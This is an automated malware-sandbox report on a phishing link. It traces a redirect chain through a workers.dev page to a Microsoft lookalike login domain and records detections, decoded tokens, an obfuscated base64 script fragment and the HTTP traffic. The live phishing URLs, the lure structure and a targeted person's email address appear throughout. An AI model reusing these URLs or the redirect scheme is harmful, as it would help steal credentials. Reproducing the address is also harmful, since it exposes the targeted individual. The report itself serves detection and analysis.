Edit tour

Windows Analysis Report
https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com

Overview

General Information

Sample URL:	https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@r
Analysis ID:	1431105
Infos:

Detection

HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish54

HTML page contains suspicious iframes

HTML page contains hidden URLs or javascript code

HTML page contains obfuscate script src

URL contains potential PII (phishing indication)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2968 --field-trial-handle=2924,i,12212526387744986071,14092912345193000886,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
2.5.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Yara detected HtmlPhish54

Source: Yara match

File source: 2.5.pages.csv, type: HTML

HTML page contains suspicious iframes

Source: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com

HTTP Parser: position:fixed;top:0;left:0;bottom:0;right:0;width:100%;height:100%;border:none;margin:0;padding:0;overflow:hidden;z-index:999999

Source: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com

HTTP Parser: Base64 decoded: {"url":"https://onmicrosoffice.online","domain":"onmicrosoffice.online","key":"W0H4QtKQv7br","qrc":"barbara.rentler@ros.com","iat":1713965080,"exp":1713965200}

Source: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJ

HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX

Sample URL: PII: barbara.rentler@ros.com

Source: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com	HTTP Parser: No favicon
Source: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com	HTTP Parser: No favicon
Source: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal	HTTP Parser: No favicon
Source: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ==	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 23.206.6.29:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.6.29:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.6.29
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com HTTP/1.1Host: insidesales-email.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?qrc=barbara.rentler@ros.com HTTP/1.1Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/471dc2adc340/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=879669880fea0acd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/879669880fea0acd/1713965058384/5bc5949f26cf89d93f31e31abc75d33badd9ed53032d1de910949dd3595c52bb/fXUOLayyxgzrnsg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/879669880fea0acd/1713965058385/hyoDSXK0siA_93U HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/879669880fea0acd/1713965058385/hyoDSXK0siA_93U HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL29ubWljcm9zb2ZmaWNlLm9ubGluZSIsImRvbWFpbiI6Im9ubWljcm9zb2ZmaWNlLm9ubGluZSIsImtleSI6IlcwSDRRdEtRdjdiciIsInFyYyI6ImJhcmJhcmEucmVudGxlckByb3MuY29tIiwiaWF0IjoxNzEzOTY1MDgwLCJleHAiOjE3MTM5NjUyMDB9.Z5J0XZvz31FwADNqgqRu9ydJA1yGWpej1k_iQgwUY74 HTTP/1.1Host: onmicrosoffice.onlineConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?qrc=barbara.rentler%40ros.com HTTP/1.1Host: onmicrosoffice.onlineConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY
Source: global traffic	HTTP traffic detected: GET /owa/?login_hint=barbara.rentler%40ros.com HTTP/1.1Host: onmicrosoffice.onlineConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY
Source: global traffic	HTTP traffic detected: GET /?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ== HTTP/1.1Host: onmicrosoffice.onlineConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; OIDC=1; OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; X-OWA-RedirectHistory=ArLym14Bctf65mFk3Ag
